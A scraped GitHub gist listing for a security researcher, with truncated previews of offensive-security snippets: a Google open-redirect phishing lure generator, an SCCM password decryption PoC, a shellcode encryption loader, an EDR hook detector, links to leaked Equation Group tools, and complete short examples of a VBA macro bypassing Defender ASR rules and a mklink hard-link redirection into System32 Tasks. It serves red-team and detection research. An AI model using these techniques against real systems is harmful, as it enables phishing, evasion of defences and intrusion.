Links describing the leaked EQ Group tools for Windows
Repositories and ports
-
Lost in Translation - A repository of the leaked tools
-
MS17-010 - Port of some of the exploits to Windows 10
Marcello byt3bl33d3r
👋
byt3bl33d3r
/ google_lure.py
Created
December 1, 2022 01:08
— forked from ustayready/google_lure.py
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
View google_lure.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from __future__ import print_function | |
| import pickle | |
| import os.path | |
| from googleapiclient.discovery import build | |
| from google_auth_oauthlib.flow import InstalledAppFlow | |
| from google.auth.transport.requests import Request | |
| from apiclient import errors | |
| import re | |
| from bs4 import BeautifulSoup as Soup |
byt3bl33d3r
/ tcpdump.py
Created
September 5, 2022 13:02
— forked from gteissier/tcpdump.py
Pythonic tcpdump: copy, paste, and enjoy
View tcpdump.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ''' | |
| It has been tested with either py2 or py3. | |
| Beware ancient versions of Linux kernel which may not support SOCK_NONBLOCK | |
| or the memory mapped ring buffer. | |
| BPF filter listed below is compiled form of "not port 22" | |
| if you want to change it, do something like |
byt3bl33d3r
/ sccmdecryptpoc.cs
Created
July 4, 2022 14:45
— forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
View sccmdecryptpoc.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;) | |
| // Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work. | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| namespace SCCMDecryptPOC | |
| { | |
| internal class Program |
byt3bl33d3r
/ EQgroup.md
Created
October 17, 2021 09:36
— forked from bontchev/EQgroup.md
Curated list of links describing the leaked Equation Group tools for Windows
View EQgroup.md
byt3bl33d3r
/ mainc.c
Created
October 2, 2021 21:22
— forked from jackullrich/mainc.c
Single Step Encryption/Decryption
View mainc.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo); | |
| typedef VOID(__stdcall* Shellcode)(); | |
| LPBYTE ShellcodeBuffer; | |
| ULONG_PTR PreviousOffset; | |
| ULONG_PTR CurrentOffset; | |
| ULONGLONG InstructionCount; | |
| DWORD dwOld; |
byt3bl33d3r
/ java-ikvm-dotnet
Created
May 31, 2021 19:28
— forked from sixman9/java-ikvm-dotnet
Using IKVM to generate a C# assembly (dll) from a Java jar file
View java-ikvm-dotnet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| See http://stackoverflow.com/questions/2947990/using-ikvm-to-convert-a-jar-flying-saucer-xhtmlrenderer | |
| I wanted to use the Flying Saucer Java API in .NET so I tried to use IKVM to convert the Flying Saucer library: | |
| ikvmc core-renderer.jar | |
| For some reason, IKVMC gave me an exe core-renderer.exe so I renamed it to core-renderer.dll, added to my assemblies and hacked away | |
| using java.io; | |
| using java.lang; | |
| using com.lowagie.text; |
byt3bl33d3r
/ ASR Rules Bypass.vba
Created
April 9, 2021 07:48
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
View ASR Rules Bypass.vba
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
byt3bl33d3r
/ dotnet-runtime-etw.py
Created
December 31, 2020 10:06
— forked from countercept/dotnet-runtime-etw.py
A research aid for tracing security relevant events in the CLR via ETW for detecting malicious assemblies.
View dotnet-runtime-etw.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import etw | |
| import etw.evntrace | |
| import sys | |
| import argparse | |
| import threading | |
| class RundownDotNetETW(etw.ETW): | |
| def __init__(self, verbose, high_risk_only): |
byt3bl33d3r
/ hookdetector.vba
Created
December 8, 2020 17:45
— forked from X-C3LL/hookdetector.vba
VBA Macro to detect EDR Hooks (It's just a PoC)
View hookdetector.vba
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
byt3bl33d3r
/ Update_Notes.md
Created
September 1, 2020 06:19
— forked from TheWover/Update_Notes.md
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property
View Update_Notes.md
Using Hard Links to point back to attacker controlled location.
mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll
This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.
xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html
NewerOlder